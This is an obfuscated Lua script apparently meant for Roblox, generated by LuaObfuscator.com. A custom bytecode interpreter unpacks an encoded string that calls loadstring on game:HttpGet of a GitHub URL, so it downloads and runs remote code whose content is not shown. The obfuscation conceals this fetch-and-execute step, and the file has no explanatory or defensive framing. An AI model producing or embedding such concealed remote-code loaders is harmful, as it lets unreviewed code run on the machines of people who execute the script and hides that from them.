--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |    \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v84=v2(v0(v30,16));if v19 then local v106=v5(v84,v19);v19=nil;return v106;else return v84;end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/(2^(v32-(2 -1))))%((5 -(1 + 2))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%(932 -(857 + 74))) ;else local v86=(570 -(367 + 32 + 169))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and 1) or (927 -(214 + (1590 -(282 + 595)))) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * (364 -108)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 997)) );v18=v18 + (1274 -(222 + 4 + 1044)) ;return (v40 * (73054774 -56277558)) + (v39 * 65536) + (v38 * ((83 + 290) -(32 + 85))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1188 -(1069 + (890 -(201 + 571))) ;local v44=(v20(v42,958 -(892 + 65) ,43 -23 ) * (((1142 -(116 + 1022)) -2)^32)) + v41 ;local v45=v20(v42,38 -17 ,56 -25 );local v46=((v20(v42,382 -(87 + 263) )==(181 -(67 + 113))) and  -(1 + 0)) or (2 -(4 -3)) ;if (v45==(0 + 0)) then if (v44==(0 -0)) then return v46 * ((559 + 393) -(802 + 150)) ;else local v107=0 + (0 -0) ;while true do if (v107==(0 -(0 -0))) then v45=1 -0 ;v43=0 -(859 -(814 + 45)) ;break;end end end elseif (v45==2047) then return ((v44==(0 + 0)) and (v46 * ((998 -(915 + 82))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2509 -(998 + 488)) ) * (v43 + (v44/((2 + 0)^(68 -16)))) ;end local function v25(v47) local v48=0 -0 ;local v49;local v50;while true do if (v48==2) then v50={};for v108=1 + (0 -0) , #v49 do v50[v108]=v2(v1(v3(v49,v108,v108)));end v48=2 + 1 + 0 ;end if ((9 -6)==v48) then return v6(v50);end if (v48==(886 -(261 + 624))) then v49=v3(v16,v18,(v18 + v47) -(1 -0) );v18=v18 + v47 ;v48=768 -(745 + 21) ;end if (v48==(1080 -(1020 + 60))) then v49=nil;if  not v47 then v47=v23();if (v47==(1423 -(630 + 793))) then return "";end end v48=2 -1 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v87,v88,v89,v90,v91,v92,v93,v94) local v87=(function() return 0 -0 ;end)();local v88=(function() return;end)();local v89=(function() return;end)();while true do if (v87== #" ") then if (v88== #"!") then v89=(function() return v90()~=(0 + 0) ;end)();elseif (v88==(2 + 0)) then v89=(function() return v91();end)();elseif (v88== #"nil") then v89=(function() return v92();end)();end v93[v94]=(function() return v89;end)();break;end if (v87~=(396 -(115 + 281))) then else local v115=(function() return 0;end)();local v116=(function() return;end)();while true do if (v115~=(0 -0)) then else v116=(function() return 0;end)();while true do if (v116==0) then v88=(function() return v90();end)();v89=(function() return nil;end)();v116=(function() return 1 + 0 ;end)();end if (v116==(2 -1)) then v87=(function() return  #"<";end)();break;end end break;end end end end return v87,v88,v89,v90,v91,v92,v93,v94;end;end)();local v52=(function() return function(v95,v96,v97) local v98=(function() return 0 -0 ;end)();local v99=(function() return;end)();while true do if ((867 -(550 + 317))==v98) then v99=(function() return 0 -0 ;end)();while true do if (v99~=0) then else v95[v96-#":" ]=(function() return v97();end)();return v95,v96,v97;end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v66= #"{",v57 do FlatIdent_7DD24,Type,Cons,v21,v24,v25,v58,v66=(function() return v51(FlatIdent_7DD24,Type,Cons,v21,v24,v25,v58,v66);end)();end v56[ #"xxx"]=(function() return v21();end)();for v67= #":",v23() do local v68=(function() return v21();end)();if (v20(v68, #"}", #">")~=(0 -0)) then else local v102=(function() return 1581 -(1535 + 46) ;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v102==(2 -1)) then local v119=(function() return 285 -(134 + 151) ;end)();local v120=(function() return;end)();while true do if (v119==(1665 -(970 + 695))) then v120=(function() return 0 + 0 ;end)();while true do if (v120==(0 -0)) then v105=(function() return {v22(),v22(),nil,nil};end)();if (v103==0) then local v165=(function() return 0 -0 ;end)();local v166=(function() return;end)();while true do if (v165==0) then v166=(function() return 1990 -(582 + 1408) ;end)();while true do if (v166==(0 -0)) then v105[ #"19("]=(function() return v22();end)();v105[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v103== #"~") then v105[ #"19("]=(function() return v23();end)();elseif (v103==2) then v105[ #"nil"]=(function() return v23() -(2^(19 -3)) ;end)();elseif (v103~= #"-19") then else local v182=(function() return 0 -0 ;end)();local v183=(function() return;end)();while true do if ((0 + 0)~=v182) then else v183=(function() return 1824 -(1195 + 629) ;end)();while true do if (v183==(0 -0)) then v105[ #"-19"]=(function() return v23() -((2 -0)^(257 -(187 + 54))) ;end)();v105[ #".com"]=(function() return v22();end)();break;end end break;end end end v120=(function() return 1;end)();end if (v120==(781 -(162 + 618))) then v102=(function() return 2 + 0 ;end)();break;end end break;end end end if (v102~=(290 -(60 + 230))) then else local v121=(function() return 0;end)();while true do if (v121==(0 + 0)) then local v127=(function() return 0 -0 ;end)();while true do if (v127==(1 -0)) then v121=(function() return 1 + 0 ;end)();break;end if (v127==(1456 -(282 + 1174))) then v103=(function() return v20(v68,813 -(569 + 242) , #"asd");end)();v104=(function() return v20(v68, #"?id=",17 -11 );end)();v127=(function() return 1 + 0 ;end)();end end end if (v121==1) then v102=(function() return 1;end)();break;end end end if (v102==(1026 -(706 + 318))) then if (v20(v104, #" ", #">")== #"[") then v105[1638 -(1373 + 263) ]=(function() return v58[v105[1273 -(945 + 326) ]];end)();end if (v20(v104,1002 -(451 + 549) ,1 + 1 )~= #"[") then else v105[ #"19("]=(function() return v58[v105[ #"nil"]];end)();end v102=(function() return 4 -1 ;end)();end if (3~=v102) then else if (v20(v104, #"-19", #"xnx")~= #"\\") then else v105[ #"asd1"]=(function() return v58[v105[ #".dev"]];end)();end v53[v67]=(function() return v105;end)();break;end end end end for v69= #"[",v23() do v54,v69,v28=(function() return v52(v54,v69,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[701 -(271 + 429) ];local v64=v60[1 + 1 ];local v65=v60[3 + 0 ];return function(...) local v70=v63;local v71=v64;local v72=v65;local v73=v27;local v74=1501 -(1408 + 92) ;local v75= -(1 -0);local v76={};local v77={...};local v78=v12("#",...) -(1289 -(993 + 295)) ;local v79={};local v80={};for v100=0 + 0 ,v78 do if ((v100>=v72) or (3282>4100)) then v76[v100-v72 ]=v77[v100 + 1 ];else v80[v100]=v77[v100 + 1 + 0 ];end end local v81=(v78-v72) + (1172 -(418 + (1735 -982))) ;local v82;local v83;while true do local v101=0 + 0 ;while true do if ((1 + 0)==v101) then if ((v83<=(1 + 2 + 1)) or (400>1111)) then if ((v83<=(1 + 0)) or (3580<2844)) then if ((89<4490) and (v83==(0 + 0))) then v80[v82[(994 -463) -(406 + 123) ]]=v82[1772 -(1749 + 20) ];else local v130=v82[1 + 1 ];v80[v130]=v80[v130](v13(v80,v130 + (1323 -(1249 + 73)) ,v75));end elseif ((3051>1005) and (v83<=(1 + 1))) then v80[v82[1147 -(466 + 679) ]]=v82[2 + 1 ]~=((0 -0) -0) ;elseif (v83==(8 -5)) then local v136=1900 -((1333 -(322 + 905)) + 1794) ;local v137;local v138;local v139;local v140;while true do if (v136==((611 -(602 + 9)) + 0)) then v137=v82[1 + 1 ];v138,v139=v73(v80[v137](v13(v80,v137 + (1131 -(369 + 761)) ,v82[8 -5 ])));v136=(1191 -(449 + 740)) -(873 -(826 + 46)) ;end if ((v136==(115 -(4 + 110))) or (4983<1808)) then v75=(v139 + v137) -((948 -(245 + 702)) -0) ;v140=584 -(57 + 527) ;v136=1429 -(41 + (4379 -2993)) ;end if (v136==(105 -(17 + 86))) then for v177=v137,v75 do local v178=0 + 0 ;while true do if (v178==(0 -0)) then v140=v140 + (2 -(1 + 0)) ;v80[v177]=v138[v140];break;end end end break;end end else local v141;local v142,v143;local v144;local v145;v80[v82[218 -(42 + 174) ]]={};v74=v74 + (167 -(122 + 44)) ;v82=v70[v74];v80[v82[2 + 0 ]]=v62[v82[3]];v74=v74 + ((1899 -(260 + 1638)) -0) ;v82=v70[v74];v80[v82[(446 -(382 + 58)) -(12 -8) ]]=v62[v82[3 + 0 ]];v74=v74 + 1 + 0 ;v82=v70[v74];v145=v82[(5 + 0) -3 ];v144=v80[v82[5 -2 ]];v80[v145 + (66 -(30 + 35)) ]=v144;v80[v145]=v144[v82[3 + 1 ]];v74=v74 + (1258 -(1043 + 214)) ;v82=v70[v74];v80[v82[(9 -4) -3 ]]=v82[8 -5 ];v74=v74 + (3 -2) ;v82=v70[v74];v80[v82[1214 -(323 + 889) ]]=v82[(2869 -(902 + 303)) -(1477 + 184) ]~=(0 -0) ;v74=v74 + (581 -(361 + 219)) ;v82=v70[v74];v145=v82[322 -(53 + 267) ];v142,v143=v73(v80[v145](v13(v80,v145 + 1 + 0 ,v82[416 -(15 + 398) ])));v75=(v143 + v145) -(2 -1) ;v141=0;for v167=v145,v75 do v141=v141 + (305 -(244 + 60)) ;v80[v167]=v142[v141];end v74=v74 + (983 -(18 + 964)) ;v82=v70[v74];v145=v82[7 -5 ];v80[v145]=v80[v145](v13(v80,v145 + 1 + 0 ,v75));v74=v74 + 1 + 0 ;v82=v70[v74];v80[v82[852 -(20 + 830) ]]();v74=v74 + 1 ;v82=v70[v74];do return;end end elseif ((3829>3769) and (3693<=4382) and (v83<=(5 + 1))) then if (v83>(131 -(116 + 10))) then do return;end else v80[v82[1615 -(1565 + 48) ]]=v62[v82[1 + 2 ]];end elseif (v83<=(5 + 2)) then v80[v82[740 -(542 + 196) ]]={};elseif ((1485<=2904) and (v83==(17 -(19 -10)))) then local v162=(643 -376) -(176 + 91) ;local v163;local v164;while true do if (v162==(2 -1)) then v80[v163 + 1 + 0 ]=v164;v80[v163]=v164[v82[3 + 1 ]];break;end if (v162==(0 + 0 + 0)) then v163=v82[4 -(1692 -(1121 + 569)) ];v164=v80[v82[(221 -(22 + 192)) -(687 -(483 + 200)) ]];v162=1552 -(1126 + 425) ;end end else v80[v82[(1870 -(1404 + 59)) -(118 + 287) ]]();end v74=v74 + (3 -2) ;break;end if ((4269==4269) and (v101==(1121 -(118 + 1003)))) then v82=v70[v74];v83=v82[(5 -3) -1 ];v101=378 -(142 + 235) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034F3Q00682Q7470733A2Q2F6769746875622E636F6D2F78383233793839386139476A6E2F776861746B696E646F66706572736F6E646F6573746861742F626C6F622F6D61696E2F696D676F2Q6E6162757374000A4Q00047Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
